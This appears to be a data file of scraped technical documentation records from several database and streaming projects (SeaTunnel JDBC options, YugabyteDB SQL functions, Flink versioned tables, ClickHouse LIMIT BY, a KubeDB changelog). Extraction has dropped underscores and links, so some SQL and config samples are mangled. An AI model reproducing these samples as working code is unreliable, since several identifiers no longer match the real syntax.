instead of `table_path` example ```hocon table_list = [ { table_path = \"testdb.table1\" } { table_path = \"testdb.table2\" query = \"select * from testdb.table2 where id > 100\" } ] ``` Common row filter conditions for all tables/queries, must start with `where`. for example `where id > 100` Source plugin common parameters, please refer to for details. The JDBC Source connector supports parallel reading of data from" }, { "data": "SeaTunnel will use certain rules to split the data in the table, which will be handed over to readers for reading. The number of readers is determined by the `parallelism` option. Split Key Rules: If `partition_column` is not null, It will be used to calculate split. The column must in Supported split data type. If `partition_column` is null, seatunnel will read the schema from table and get the Primary Key and Unique Index. If there are more than one column in Primary Key and Unique Index, The first column which in the supported split data type will be used to split data. For example, the table have Primary Key(nn guid, name varchar), because `guid` id not in supported split data type, so the column `name` will be used to split data. Supported split data type: String Number(int, bigint, decimal, ...) Date How many rows in one split, captured tables are split into multiple splits when read of table. Not recommended for use The lower bound of the chunk key distribution factor. This factor is used to determine whether the table data is evenly distributed. If the distribution factor is calculated to be greater than or equal to this lower bound (i.e., (MAX(id) - MIN(id) + 1) / row count), the table chunks would be optimized for even distribution. Otherwise, if the distribution factor is less, the table will be considered as unevenly distributed and the sampling-based sharding strategy will be used if the estimated shard count exceeds the value specified by `sample-sharding.threshold`. The default value is 0.05. Not recommended for use The upper bound of the chunk key distribution factor. This factor is used to determine whether the table data is evenly distributed. If the distribution factor is calculated to be less than or equal to this upper bound (i.e., (MAX(id) - MIN(id) + 1) / row count), the table chunks would be optimized for even distribution. Otherwise, if the distribution factor is greater, the table will be considered as unevenly distributed and the sampling-based sharding strategy will be used if the estimated shard count exceeds the value specified by `sample-sharding.threshold`. The default value is 100.0. This configuration specifies the threshold of estimated shard count to trigger the sample sharding strategy. When the distribution factor is outside the bounds specified by `chunk-key.even-distribution.factor.upper-bound` and `chunk-key.even-distribution.factor.lower-bound`, and the estimated shard count (calculated as approximate row count / chunk size) exceeds this threshold, the sample sharding strategy will be used. This can help to handle large datasets more efficiently. The default value is 1000 shards. The inverse of the sampling rate used in the sample sharding strategy. For example, if this value is set to 1000, it means a 1/1000 sampling rate is applied during the sampling process. This option provides flexibility in controlling the granularity of the sampling, thus affecting the final number of shards. It's especially useful when dealing with very large datasets where a lower sampling rate is preferred. The default value is 1000. The column name for split data. The partition_column max value for scan, if not set SeaTunnel will query database get max value. The partition_column min value for scan, if not set SeaTunnel will query database get min value. Not recommended for use, The correct approach is to control the number of split through `split.size` How many splits do we need to split into, only support positive integer. default value is job" }, { "data": "If the table can not be split(for example, table have no Primary Key or Unique Index, and `partition_column` is not set), it will run in single concurrency. Use `tablepath` to replace `query` for single table reading. If you need to read multiple tables, use `tablelist`. there are some reference value for params above. | datasource | driver | url | maven | |-|--||-| | mysql | com.mysql.cj.jdbc.Driver | jdbc:mysql://localhost:3306/test | https://mvnrepository.com/artifact/mysql/mysql-connector-java | | postgresql | org.postgresql.Driver | jdbc:postgresql://localhost:5432/postgres | https://mvnrepository.com/artifact/org.postgresql/postgresql | | dm | dm.jdbc.driver.DmDriver | jdbc:dm://localhost:5236 | https://mvnrepository.com/artifact/com.dameng/DmJdbcDriver18 | | phoenix | org.apache.phoenix.queryserver.client.Driver | jdbc:phoenix:thin:url=http://localhost:8765;serialization=PROTOBUF | https://mvnrepository.com/artifact/com.aliyun.phoenix/ali-phoenix-shaded-thin-client | | sqlserver | com.microsoft.sqlserver.jdbc.SQLServerDriver | jdbc:sqlserver://localhost:1433 | https://mvnrepository.com/artifact/com.microsoft.sqlserver/mssql-jdbc | | oracle | oracle.jdbc.OracleDriver | jdbc:oracle:thin:@localhost:1521/xepdb1 | https://mvnrepository.com/artifact/com.oracle.database.jdbc/ojdbc8 | | sqlite | org.sqlite.JDBC | jdbc:sqlite:test.db | https://mvnrepository.com/artifact/org.xerial/sqlite-jdbc | | gbase8a | com.gbase.jdbc.Driver | jdbc:gbase://e2egbase8aDb:5258/test | https://www.gbase8.cn/wp-content/uploads/2020/10/gbase-connector-java-8.3.81.53-build55.5.7-binmin_mix.jar | | starrocks | com.mysql.cj.jdbc.Driver | jdbc:mysql://localhost:3306/test | https://mvnrepository.com/artifact/mysql/mysql-connector-java | | db2 | com.ibm.db2.jcc.DB2Driver | jdbc:db2://localhost:50000/testdb | https://mvnrepository.com/artifact/com.ibm.db2.jcc/db2jcc/db2jcc4 | | tablestore | com.alicloud.openservices.tablestore.jdbc.OTSDriver | \"jdbc:ots:http s://myinstance.cn-hangzhou.ots.aliyuncs.com/myinstance\" | https://mvnrepository.com/artifact/com.aliyun.openservices/tablestore-jdbc | | saphana | com.sap.db.jdbc.Driver | jdbc:sap://localhost:39015 | https://mvnrepository.com/artifact/com.sap.cloud.db.jdbc/ngdbc | | doris | com.mysql.cj.jdbc.Driver | jdbc:mysql://localhost:3306/test | https://mvnrepository.com/artifact/mysql/mysql-connector-java | | teradata | com.teradata.jdbc.TeraDriver | jdbc:teradata://localhost/DBS_PORT=1025,DATABASE=test | https://mvnrepository.com/artifact/com.teradata.jdbc/terajdbc | | Snowflake | net.snowflake.client.jdbc.SnowflakeDriver | jdbc:snowflake://<account_name>.snowflakecomputing.com | https://mvnrepository.com/artifact/net.snowflake/snowflake-jdbc | | Redshift | com.amazon.redshift.jdbc42.Driver | jdbc:redshift://localhost:5439/testdb?defaultRowFetchSize=1000 | https://mvnrepository.com/artifact/com.amazon.redshift/redshift-jdbc42 | | Vertica | com.vertica.jdbc.Driver | jdbc:vertica://localhost:5433 | https://repo1.maven.org/maven2/com/vertica/jdbc/vertica-jdbc/12.0.3-0/vertica-jdbc-12.0.3-0.jar | | Kingbase | com.kingbase8.Driver | jdbc:kingbase8://localhost:54321/db_test | https://repo1.maven.org/maven2/cn/com/kingbase/kingbase8/8.6.0/kingbase8-8.6.0.jar | | OceanBase | com.oceanbase.jdbc.Driver | jdbc:oceanbase://localhost:2881 | https://repo1.maven.org/maven2/com/oceanbase/oceanbase-client/2.4.3/oceanbase-client-2.4.3.jar | | Hive | org.apache.hive.jdbc.HiveDriver | jdbc:hive2://localhost:10000 | https://repo1.maven.org/maven2/org/apache/hive/hive-jdbc/3.1.3/hive-jdbc-3.1.3-standalone.jar | | xugu | com.xugu.cloudjdbc.Driver | jdbc:xugu://localhost:5138 | https://repo1.maven.org/maven2/com/xugudb/xugu-jdbc/12.2.0/xugu-jdbc-12.2.0.jar | | InterSystems IRIS | com.intersystems.jdbc.IRISDriver | jdbc:IRIS://localhost:1972/%SYS | https://raw.githubusercontent.com/intersystems-community/iris-driver-distribution/main/JDBC/JDK18/intersystems-jdbc-3.8.4.jar | ``` Jdbc { url = \"jdbc:mysql://localhost/test?serverTimezone=GMT%2b8\" driver = \"com.mysql.cj.jdbc.Driver\" connectionchecktimeout_sec = 100 user = \"root\" password = \"123456\" query = \"select * from type_bin\" } ``` ``` env { parallelism = 10 job.mode = \"BATCH\" } source { Jdbc { url = \"jdbc:mysql://localhost/test?serverTimezone=GMT%2b8\" driver = \"com.mysql.cj.jdbc.Driver\" connectionchecktimeout_sec = 100 user = \"root\" password = \"123456\" query = \"select * from type_bin\" partition_column = \"id\" split.size = 10000 } } sink { Console {} } ``` It is more efficient to specify the data within the upper and lower bounds of the query. It is more efficient to read your data source according to the upper and lower boundaries you configured. ``` source { Jdbc { url = \"jdbc:mysql://localhost:3306/test?serverTimezone=GMT%2b8&useUnicode=true&characterEncoding=UTF-8&rewriteBatchedStatements=true\" driver = \"com.mysql.cj.jdbc.Driver\" connectionchecktimeout_sec = 100 user = \"root\" password = \"123456\" query = \"select * from type_bin\" partition_column = \"id\" partitionlowerbound = 1 partitionupperbound = 500 partition_num = 10 properties { useSSL=false } } } ``` Configuring `table_path` will turn on auto split, you can configure `split.*` to adjust the split strategy ``` env { parallelism = 10 job.mode = \"BATCH\" } source { Jdbc { url = \"jdbc:mysql://localhost/test?serverTimezone=GMT%2b8\" driver = \"com.mysql.cj.jdbc.Driver\" connectionchecktimeout_sec = 100 user = \"root\" password = \"123456\" table_path = \"testdb.table1\" query = \"select * from testdb.table1\" split.size = 10000 } } sink { Console {} } ``` *Configuring `table_list` will turn on auto split, you can configure `split.*` to adjust the split strategy* ```hocon Jdbc { url = \"jdbc:mysql://localhost/test?serverTimezone=GMT%2b8\" driver = \"com.mysql.cj.jdbc.Driver\" connectionchecktimeout_sec = 100 user = \"root\" password = \"123456\" table_list = [ { table_path = \"testdb.table1\" }, { table_path = \"testdb.table2\" query = \"select id, name from testdb.table2 where id > 100\" } ] } ``` Add ClickHouse Source Connector ) ) ) ) ) ) ) ) ) ) ) ) ) ) )" } ]
{ "category": "App Definition and Development", "file_name": "jsonb-object-agg.md", "project_name": "YugabyteDB", "subcategory": "Database" }
[ { "data": "title: jsonbobjectagg() headerTitle: jsonbobjectagg() linkTitle: jsonbobjectagg() description: Aggregate a SETOF values into a JSON object. menu: v2.18: identifier: jsonb-object-agg parent: json-functions-operators weight: 155 type: docs Purpose: This is an aggregate function. (Aggregate functions compute a single result from a `SETOF` input values.) It creates a JSON object whose values are the JSON representations of the aggregated SQL values. It is most useful when these to-be-aggregated values are \"row\" type values with two fields. The first represents the key and the second represents the value of the intended JSON object's key-value pair. Signature: ``` input value: anyelement return value: jsonb ``` Notes: The syntax \"order by... nulls first\" within the parentheses of the aggregate function (a generic feature of aggregate functions) isn't useful here because the order of the key-value pairs of a JSON object has no semantic significance. (The `::text` typecast of a `jsonb` object uses the convention of ordering the pairs alphabetically by the key. ```plpgsql do $body$ declare object_agg jsonb not null := '\"?\"'; expectedobjectagg constant jsonb not null := '{\"f1\": 1, \"f2\": 2, \"f3\": null, \"f4\": 4}'::jsonb; begin with tab as ( values ('f4'::text, 4::int), ('f1'::text, 1::int), ('f3'::text, null::int), ('f2'::text, 2::int)) select jsonbobjectagg(column1, column2) into strict object_agg from tab; assert (objectagg = expectedobject_agg), 'unexpected'; end; $body$; ``` An object is a set of key-value pairs where each key is unique and the order is undefined and insignificant. (As explained earlier, when a JSON literal is This example emphasizes the property of a JSON object that keys are unique. (See the accounts of the functions.) This means that if a key-value pair is specified more than once, then the one that is most recently specified wins. You see the same rule at work here: ```plpgsql select ('{\"f2\": 42, \"f7\": 7, \"f2\": null}'::jsonb)::text; ``` It shows this: ``` text -- {\"f2\": null, \"f7\": 7} ``` The `DO` block specifies both the value for key \"f2\" and the value for key \"f7\" twice: ```plpgsql do $body$ declare object_agg jsonb not null := '\"?\"'; expectedobjectagg constant jsonb not null := '{\"f2\": null, \"f7\": 7}'::jsonb; begin with tab as ( values ('f2'::text, 4::int), ('f7'::text, 7::int), ('f2'::text, 1::int), ('f2'::text, null::int)) select jsonbobjectagg(column1, column2) into strict object_agg from tab; assert (objectagg = expectedobject_agg), 'unexpected'; end; $body$; ```" } ]
{ "category": "App Definition and Development", "file_name": "hook_outcome_in_place_construction.md", "project_name": "ArangoDB", "subcategory": "Database" }
[ { "data": "+++ title = \"`void hookoutcomeinplaceconstruction(T *, inplacetype_t<U>, Args &&...) noexcept`\" description = \"(Until v2.2.0) ADL discovered free function hook invoked by the in-place constructors of `basic_outcome`.\" +++ Removed in Outcome v2.2.0, unless {{% api \"BOOSTOUTCOMEENABLELEGACYSUPPORT_FOR\" %}} is set to less than `220` to enable emulation. Use {{% api \"onoutcomeinplaceconstruction(T *, inplacetype_t<U>, Args &&...) noexcept\" %}} instead in new code. One of the constructor hooks for {{% api \"basicoutcome<T, EC, EP, NoValuePolicy>\" %}}, generally invoked by the in-place constructors of `basicoutcome`. See each constructor's documentation to see which specific hook it invokes. Overridable: By Argument Dependent Lookup. Requires: Nothing. Namespace: `BOOSTOUTCOMEV2_NAMESPACE::hooks` Header: `<boost/outcome/basic_outcome.hpp>`" } ]
{ "category": "App Definition and Development", "file_name": "filter.md", "project_name": "Numaflow", "subcategory": "Streaming & Messaging" }
[ { "data": "A `filter` is a special-purpose built-in function. It is used to evaluate on each message in a pipeline and is often used to filter the number of messages that are passed to next vertices. Filter function supports comprehensive expression language which extends flexibility write complex expressions. `payload` will be root element to represent the message object in expression. Filter expression implemented with `expr` and `sprig` libraries. These function can be accessed directly in expression. `json` - Convert payload in JSON object. e.g: `json(payload)` `int` - Convert element/payload into `int` value. e.g: `int(json(payload).id)` `string` - Convert element/payload into `string` value. e.g: `string(json(payload).amount)` `Sprig` library has 70+ functions. `sprig` prefix need to be added to access the sprig functions. E.g: `sprig.contains('James', json(payload).name)` # `James` is contained in the value of `name`. `int(json(sprig.b64dec(payload)).id) < 100` ```yaml spec: vertices: name: in source: http: {} transformer: builtin: name: filter kwargs: expression: int(json(payload).id) < 100 ```" } ]
{ "category": "App Definition and Development", "file_name": "versioned_tables.md", "project_name": "Flink", "subcategory": "Streaming & Messaging" }
[ { "data": "title: \"Versioned Tables\" weight: 4 type: docs aliases: /dev/table/streaming/versioned_tables.html /dev/table/streaming/temporal_tables.html <!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> Flink SQL operates over dynamic tables that evolve, which may either be append-only or updating. Versioned tables represent a special type of updating table that remembers the past values for each key. Dynamic tables define relations over time. Often, particularly when working with metadata, a key's old value does not become irrelevant when it changes. Flink SQL can define versioned tables over any dynamic table with a `PRIMARY KEY` constraint and time attribute. A primary key constraint in Flink means that a column or set of columns of a table or view are unique and non-null. The primary key semantic on a upserting table means the materialized changes for a particular key (`INSERT`/`UPDATE`/`DELETE`) represent the changes to a single row over time. The time attribute on a upserting table defines when each change occurred. Taken together, Flink can track the changes to a row over time and maintain the period for which each value was valid for that key. Suppose a table tracks the prices of different products in a store. ```sql (changelog kind) updatetime productid product_name price ================= =========== ========== ============ ===== +(INSERT) 00:01:00 p_001 scooter 11.11 +(INSERT) 00:02:00 p_002 basketball 23.11 -(UPDATEBEFORE) 12:00:00 p001 scooter 11.11 +(UPDATEAFTER) 12:00:00 p001 scooter 12.99 -(UPDATEBEFORE) 12:00:00 p002 basketball 23.11 +(UPDATEAFTER) 12:00:00 p002 basketball 19.99 -(DELETE) 18:00:00 p_001 scooter 12.99 ``` Given this set of changes, we track how the price of a scooter changes over time. It is initially $11.11 at `00:01:00` when added to the catalog. The price then rises to $12.99 at `12:00:00` before being deleted from the catalog at `18:00:00`. If we queried the table for various products' prices at different times, we would retrieve different results. At `10:00:00` the table would show one set of prices. ```sql updatetime productid product_name price =========== ========== ============ ===== 00:01:00 p_001 scooter 11.11 00:02:00 p_002 basketball 23.11 ``` While at `13:00:00,` we would find another set of prices. ```sql updatetime productid product_name price =========== ========== ============ ===== 12:00:00 p_001 scooter 12.99 12:00:00 p_002 basketball 19.99 ``` Versioned tables are defined implicitly for any tables whose underlying sources or formats directly define changelogs. Examples include the source as well as database changelog formats such as and" }, { "data": "As discussed above, the only additional requirement is the `CREATE` table statement must contain a `PRIMARY KEY` and an event-time attribute. ```sql CREATE TABLE products ( product_id STRING, product_name STRING, price DECIMAL(32, 2), update_time TIMESTAMP(3) METADATA FROM 'value.source.timestamp' VIRTUAL, PRIMARY KEY (product_id) NOT ENFORCED, WATERMARK FOR updatetime AS updatetime ) WITH (...); ``` Flink also supports defining versioned views if the underlying query contains a unique key constraint and event-time attribute. Imagine an append-only table of currency rates. ```sql CREATE TABLE currency_rates ( currency STRING, rate DECIMAL(32, 10), update_time TIMESTAMP(3), WATERMARK FOR updatetime AS updatetime ) WITH ( 'connector' = 'kafka', 'topic' = 'rates', 'properties.bootstrap.servers' = 'localhost:9092', 'format' = 'json' ); ``` The table `currency_rates` contains a row for each currency &mdash; with respect to USD &mdash; and receives a new row each time the rate changes. The `JSON` format does not support native changelog semantics, so Flink can only read this table as append-only. ```sql (changelog kind) update_time currency rate ================ ============= ========= ==== +(INSERT) 09:00:00 Yen 102 +(INSERT) 09:00:00 Euro 114 +(INSERT) 09:00:00 USD 1 +(INSERT) 11:15:00 Euro 119 +(INSERT) 11:45:00 Pounds 107 +(INSERT) 11:49:00 Pounds 108 ``` Flink interprets each row as an `INSERT` to the table, meaning we cannot define a `PRIMARY KEY` over currency. However, it is clear to us (the query developer) that this table has all the necessary information to define a versioned table. Flink can reinterpret this table as a versioned table by defining a which produces an ordered changelog stream with an inferred primary key (currency) and event time (update_time). ```sql -- Define a versioned view CREATE VIEW versioned_rates AS SELECT currency, rate, updatetime -- (1) `updatetime` keeps the event time FROM ( SELECT *, ROW_NUMBER() OVER (PARTITION BY currency -- (2) the inferred unique key `currency` can be a primary key ORDER BY update_time DESC) AS rownum FROM currency_rates) WHERE rownum = 1; -- the view `versioned_rates` will produce a changelog as the following. (changelog kind) update_time currency rate ================ ============= ========= ==== +(INSERT) 09:00:00 Yen 102 +(INSERT) 09:00:00 Euro 114 +(INSERT) 09:00:00 USD 1 +(UPDATE_AFTER) 11:15:00 Euro 119 +(INSERT) 11:45:00 Pounds 107 +(UPDATE_AFTER) 11:49:00 Pounds 108 ``` Flink has a special optimization step that will efficiently transform this query into a versioned table usable in subsequent queries. In general, the results of a query with the following format produces a versioned table: ```sql SELECT [column_list] FROM ( SELECT [column_list], ROW_NUMBER() OVER ([PARTITION BY col1[, col2...]] ORDER BY time_attr DESC) AS rownum FROM table_name) WHERE rownum = 1 ``` Parameter Specification: `ROW_NUMBER()`: Assigns an unique, sequential number to each row, starting with one. `PARTITION BY col1[, col2...]`: Specifies the partition columns, i.e. the deduplicate key. These columns form the primary key of the subsequent versioned table. `ORDER BY time_attr DESC`: Specifies the ordering column, it must be a . `WHERE rownum = 1`: The `rownum = 1` is required for Flink to recognize this query is to generate a versioned table. {{< top >}}" } ]
{ "category": "App Definition and Development", "file_name": "belllabs.md", "project_name": "Beam", "subcategory": "Streaming & Messaging" }
[ { "data": "title: \"Bell Labs\" icon: /images/logos/powered-by/belllabs.png hasLink: \"https://www.bell-labs.com/#gref\" <!-- Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. -->" } ]
{ "category": "App Definition and Development", "file_name": "CHANGELOG-v2021.06.23.md", "project_name": "KubeDB by AppsCode", "subcategory": "Database" }
[ { "data": "title: Changelog | KubeDB description: Changelog menu: docs_{{.version}}: identifier: changelog-kubedb-v2021.06.23 name: Changelog-v2021.06.23 parent: welcome weight: 20210623 product_name: kubedb menuname: docs{{.version}} sectionmenuid: welcome url: /docs/{{.version}}/welcome/changelog-v2021.06.23/ aliases: /docs/{{.version}}/CHANGELOG-v2021.06.23/ Prepare for release v0.4.0 (#27) Disable api priority and fairness feature for webhook server (#26) Prepare for release v0.4.0-rc.0 (#25) Update audit lib (#24) Send audit events if analytics enabled Create auditor if license file is provided (#23) Publish audit events (#22) Use kglog helper Use k8s 1.21.0 toolchain (#21) Prepare for release v0.6.0 (#202) Improve Elasticsearch version upgrade with reconciler (#201) Use NSSWrapper for PgUpgrade Command (#200) Prepare for release v0.6.0-rc.0 (#199) Update audit lib (#197) Add MariaDB OpsReq [Restart, Upgrade, Scaling, Volume Expansion, Reconfigure Custom Config] (#179) Postgres Ops Req (Upgrade, Horizontal, Vertical, Volume Expansion, Reconfigure, Reconfigure TLS, Restart) (#193) Skip stash checks if stash CRD doesn't exist (#196) Refactor MongoDB Scale Down Shard (#189) Add timeout for Elasticsearch ops request (#183) Send audit events if analytics enabled Create auditor if license file is provided (#195) Publish audit events (#194) Fix log level issue with klog (#187) Use kglog helper Update Kubernetes toolchain to v1.21.0 (#181) Only restart the changed pods while VerticalScaling Elasticsearch (#174) Add docs badge Postgres DB Container's RunAsGroup As FSGroup (#769) Add fixes to helper method (#768) Use Stash v2021.06.23 Update audit event publisher (#767) Add MariaDB Constants (#766) Update Elasticsearch API to support various node roles including hot-warm-cold (#764) Update for release Stash@v2021.6.18 (#765) Fix locking in ResourceMapper Send audit events if analytics enabled Add auditor to shared Controller (#761) Rename TimeoutSeconds to Timeout in MongoDBOpsRequest (#759) Add timeout for each step of ES ops request (#742) Add MariaDB OpsRequest Types (#743) Update default resource limits for databases (#755) Add UpdateMariaDBOpsRequestStatus function (#727) Add Fields, Constant, Func For Ops Request Postgres (#758) Add Innodb Group Replication Mode (#750) Replace go-bindata with //go:embed (#753) Add HealthCheckInterval constant (#752) Use kglog helper Fix tests (#749) Cleanup dependencies Update crds Update Kubernetes toolchain to v1.21.0 (#746) Add Elasticsearch vertical scaling constants (#741) Prepare for release v0.19.0 (#610) Prepare for release v0.19.0-rc.0 (#609) Use Kubernetes 1.21.1 toolchain (#608) Use kglog helper Cleanup dependencies (#607) Use Kubernetes v1.21.0 toolchain (#606) Use Kubernetes v1.21.0 toolchain (#605) Use Kubernetes v1.21.0 toolchain (#604) Use Kubernetes v1.21.0 toolchain (#603) Use Kubernetes v1.21.0 toolchain (#602) Use Kubernetes v1.21.0 toolchain (#601) Update Kubernetes toolchain to v1.21.0 (#600) Prepare for release v0.19.0 (#503) Prepare for release v0.19.0-rc.0 (#502) Update audit lib (#501) Do not create user credentials when security is disabled (#500) Add support for various node roles for" }, { "data": "(#499) Send audit events if analytics enabled Create auditor if license file is provided (#498) Publish audit events (#497) Skip health check for halted DB (#494) Disable flow control if api is not enabled (#495) Fix log level issue with klog (#496) Limit health checker go-routine for specific DB object (#491) Use kglog helper Cleanup glog dependency Update dependencies Update Kubernetes toolchain to v1.21.0 (#492) Prepare for release v2021.06.23 (#317) Prepare for release v2021.06.21-rc.0 (#315) Use Stash v2021.06.23 Use Kubernetes 1.21.1 toolchain (#314) Add support for Elasticsearch v7.13.2 (#313) Support MongoDB Version 4.4.6 (#312) Update Elasticsearch versions to support various node roles (#308) Update for release Stash@v2021.6.18 (#311) Update to MariaDB init docker version 0.2.0 (#310) Fix: Update Ops Request yaml for Reconfigure TLS in Postgres (#307) Use mongodb-exporter v0.20.4 (#305) Update Kubernetes toolchain to v1.21.0 (#302) Add monitoring values to global chart (#301) Prepare for release v0.3.0 (#78) Prepare for release v0.3.0-rc.0 (#77) Update audit lib (#75) Update custom config mount path for MariaDB Cluster (#59) Separate Reconcile functionality in a new function ReconcileNode (#68) Limit Go routines in Health Checker (#73) Send audit events if analytics enabled (#74) Create auditor if license file is provided (#72) Publish audit events (#71) Fix log level issue with klog for MariaDB (#70) Use kglog helper Use klog/v2 Update Kubernetes toolchain to v1.21.0 (#66) Prepare for release v0.12.0 (#301) Disable api priority and fairness feature for webhook server (#300) Prepare for release v0.12.0-rc.0 (#299) Update audit lib (#298) Send audit events if analytics enabled (#297) Publish audit events (#296) Use kglog helper Use klog/v2 Update Kubernetes toolchain to v1.21.0 (#294) Prepare for release v0.12.0 (#402) Fix mongodb exporter error (#401) Prepare for release v0.12.0-rc.0 (#400) Update audit lib (#399) Limit go routine in health check (#394) Update TLS args for Exporter (#395) Send audit events if analytics enabled (#398) Create auditor if license file is provided (#397) Publish audit events (#396) Fix log level issue with klog (#393) Use kglog helper Use klog/v2 Update Kubernetes toolchain to v1.21.0 (#391) Prepare for release v0.12.0 (#393) Prepare for release v0.12.0-rc.0 (#392) Limit Health Checker goroutines (#385) Use gomodules.xyz/password-generator v0.2.7 Update audit library (#390) Send audit events if analytics enabled (#389) Create auditor if license file is provided (#388) Publish audit events (#387) Fix log level issue with klog for mysql (#386) Use kglog helper Use klog/v2 Update Kubernetes toolchain to v1.21.0 (#383) Prepare for release v0.19.0 (#409) Disable api priority and fairness feature for webhook server (#408) Prepare for release v0.19.0-rc.0 (#407) Update audit lib (#406) Send audit events if analytics enabled (#405) Stop using gomodules.xyz/version Publish audit events (#404) Use kglog helper Update Kubernetes toolchain to" }, { "data": "(#403) Prepare for release v0.6.0 (#203) Disable api priority and fairness feature for webhook server (#202) Prepare for release v0.6.0-rc.0 (#201) Update audit lib (#200) Send audit events if analytics enabled (#199) Create auditor if license file is provided (#198) Publish audit events (#197) Use kglog helper Use klog/v2 Update Kubernetes toolchain to v1.21.0 (#195) Prepare for release v0.3.0 (#26) Prepare for release v0.3.0-rc.0 (#25) Update Client TLS Path for Postgres (#24) Raft Version Update And Ops Request Fix (#23) Use klog/v2 (#19) Use klog/v2 Prepare for release v0.6.0 (#163) Disable api priority and fairness feature for webhook server (#162) Prepare for release v0.6.0-rc.0 (#161) Update audit lib (#160) Send audit events if analytics enabled (#159) Create auditor if license file is provided (#158) Publish audit events (#157) Use kglog helper Use klog/v2 Update Kubernetes toolchain to v1.21.0 (#155) Prepare for release v0.19.0 (#509) Prepare for release v0.19.0-rc.0 (#508) Run All DB Pod's Container with Custom-UID (#507) Update audit lib (#506) Limit Health Check for Postgres (#504) Send audit events if analytics enabled (#505) Create auditor if license file is provided (#503) Stop using gomodules.xyz/version (#501) Publish audit events (#500) Fix: Log Level Issue with klog (#496) Use kglog helper Use klog/v2 Update Kubernetes toolchain to v1.21.0 (#492) Prepare for release v0.6.0 (#181) Disable api priority and fairness feature for webhook server (#180) Prepare for release v0.6.0-rc.0 (#179) Update audit lib (#178) Send audit events if analytics enabled (#177) Create auditor if license file is provided (#176) Publish audit events (#175) Use kglog helper Use klog/v2 Update Kubernetes toolchain to v1.21.0 (#173) Prepare for release v0.12.0 (#326) Disable api priority and fairness feature for webhook server (#325) Prepare for release v0.12.0-rc.0 (#324) Update audit lib (#323) Limit Health Check go-routine Redis (#321) Send audit events if analytics enabled (#322) Create auditor if license file is provided (#320) Add auditor handler Publish audit events (#319) Use kglog helper Use klog/v2 Update Kubernetes toolchain to v1.21.0 (#317) Prepare for release v0.6.0 (#144) Prepare for release v0.6.0-rc.0 (#143) Remove glog dependency Use kglog helper Update repository config (#142) Use klog/v2 Use Kubernetes v1.21.0 toolchain (#140) Use Kubernetes v1.21.0 toolchain (#139) Use Kubernetes v1.21.0 toolchain (#138) Use Kubernetes v1.21.0 toolchain (#137) Update Kubernetes toolchain to v1.21.0 (#136) Prepare for release v0.4.0 (#125) Prepare for release v0.4.0-rc.0 (#124) Fix locking in ResourceMapper (#123) Update dependencies (#122) Use kglog helper Use klog/v2 Use Kubernetes v1.21.0 toolchain (#120) Use Kubernetes v1.21.0 toolchain (#119) Use Kubernetes v1.21.0 toolchain (#118) Use Kubernetes v1.21.0 toolchain (#117) Update Kubernetes toolchain to v1.21.0 (#116) Fix Elasticsearch status check while creating the client (#114)" } ]
{ "category": "App Definition and Development", "file_name": "limit-by.md", "project_name": "ClickHouse", "subcategory": "Database" }
[ { "data": "slug: /en/sql-reference/statements/select/limit-by sidebar_label: LIMIT BY A query with the `LIMIT n BY expressions` clause selects the first `n` rows for each distinct value of `expressions`. The key for `LIMIT BY` can contain any number of . ClickHouse supports the following syntax variants: `LIMIT [offset_value, ]n BY expressions` `LIMIT n OFFSET offset_value BY expressions` During query processing, ClickHouse selects data ordered by sorting key. The sorting key is set explicitly using an clause or implicitly as a property of the table engine (row order is only guaranteed when using , otherwise the row blocks will not be ordered due to multi-threading). Then ClickHouse applies `LIMIT n BY expressions` and returns the first `n` rows for each distinct combination of `expressions`. If `OFFSET` is specified, then for each data block that belongs to a distinct combination of `expressions`, ClickHouse skips `offsetvalue` number of rows from the beginning of the block and returns a maximum of `n` rows as a result. If `offsetvalue` is bigger than the number of rows in the data block, ClickHouse returns zero rows from the block. :::note `LIMIT BY` is not related to . They can both be used in the same query. ::: If you want to use column numbers instead of column names in the `LIMIT BY` clause, enable the setting . Sample table: ``` sql CREATE TABLE limit_by(id Int, val Int) ENGINE = Memory; INSERT INTO limit_by VALUES (1, 10), (1, 11), (1, 12), (2, 20), (2, 21); ``` Queries: ``` sql SELECT * FROM limit_by ORDER BY id, val LIMIT 2 BY id ``` ``` text idval 1 10 1 11 2 20 2 21 ``` ``` sql SELECT * FROM limit_by ORDER BY id, val LIMIT 1, 2 BY id ``` ``` text idval 1 11 1 12 2 21 ``` The `SELECT * FROM limit_by ORDER BY id, val LIMIT 2 OFFSET 1 BY id` query returns the same result. The following query returns the top 5 referrers for each `domain, device_type` pair with a maximum of 100 rows in total (`LIMIT n BY + LIMIT`). ``` sql SELECT domainWithoutWWW(URL) AS domain, domainWithoutWWW(REFERRER_URL) AS referrer, device_type, count() cnt FROM hits GROUP BY domain, referrer, device_type ORDER BY cnt DESC LIMIT 5 BY domain, device_type LIMIT 100 ```" } ]
{ "category": "App Definition and Development", "file_name": "ddl_create_foreign_table.md", "project_name": "YugabyteDB", "subcategory": "Database" }
[ { "data": "title: CREATE FOREIGN TABLE statement [YSQL] headerTitle: CREATE FOREIGN TABLE linkTitle: CREATE FOREIGN TABLE description: Use the CREATE FOREIGN TABLE statement to create a foreign table. menu: v2.18: identifier: ddlcreateforeign_table parent: statements type: docs Use the `CREATE FOREIGN TABLE` command to create a foreign table. {{%ebnf%}} createforeigntable {{%/ebnf%}} Create a new foreign table named table_name. If table_name already exists in the specified database, an error will be raised unless the `IF NOT EXISTS` clause is used. The `COLLATE` clause can be used to specify a collation for the column. The `SERVER` clause can be used to specify the name of the foreign server to use. The `OPTIONS` clause specifies options for the foreign table. The permitted option names and values are specific to each foreign data wrapper. The options are validated using the FDWs validator function. Basic example. ```plpgsql yugabyte=# CREATE FOREIGN TABLE mytable (col1 int, col2 int) SERVER myserver OPTIONS (schema 'externalschema', table 'external_table'); ```" } ]
